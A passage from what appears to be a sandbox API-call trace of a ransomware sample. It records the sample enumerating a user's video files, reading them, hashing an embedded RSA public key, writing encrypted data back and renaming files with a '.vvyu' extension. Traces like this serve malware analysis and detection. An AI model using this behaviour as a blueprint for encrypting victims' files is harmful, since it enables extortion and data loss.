hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0202.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.801] GetCurrentThreadId () returned 0x66c [0202.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea9678 [0202.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.802] GetCurrentThreadId () returned 0x66c [0202.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0202.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0202.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36f8 [0202.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3758 [0202.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0202.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0202.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0202.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3770 [0202.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3710 [0202.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0202.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36e0 [0202.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0202.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0202.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0202.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0202.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0202.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0202.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1d08 | out: hHeap=0x620000) returned 1 [0202.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.813] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x144b1, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x144b1, lpOverlapped=0x0) returned 1 [0202.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.815] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x144b6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.815] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.816] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.817] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.817] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.817] CloseHandle (hObject=0x510) returned 1 [0202.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0202.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0202.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0202.819] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\Nm71rwXGGr4kpL3.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\nm71rwxggr4kpl3.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\Nm71rwXGGr4kpL3.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\nm71rwxggr4kpl3.mp4.vvyu")) returned 1 [0202.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.821] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0202.824] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708ab330, ftCreationTime.dwHighDateTime=0x1d8a09c, ftLastAccessTime.dwLowDateTime=0x2b94c1f0, ftLastAccessTime.dwHighDateTime=0x1d8a522, ftLastWriteTime.dwLowDateTime=0x2b94c1f0, ftLastWriteTime.dwHighDateTime=0x1d8a522, nFileSizeHigh=0x0, nFileSizeLow=0x1264, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rfES3vfWf3fsY6Sx.flv", cAlternateFileName="RFES3V~1.FLV")) returned 1 [0202.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0202.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.824] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\rfES3vfWf3fsY6Sx.flv") returned=".flv" [0202.824] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\rfES3vfWf3fsY6Sx.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\rfes3vfwf3fsy6sx.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.825] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=4708) returned 1 [0202.825] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.828] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x123e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.828] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.832] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.832] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x1264, lpOverlapped=0x0) returned 1 [0202.833] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.834] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.834] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.834] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.835] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.835] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.835] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.835] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.835] GetLastError () returned 0x0 [0202.835] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.835] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.836] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.836] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.836] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1260) returned 0x2e902a0 [0202.836] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1d08 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1d50 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.837] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0202.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3710 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 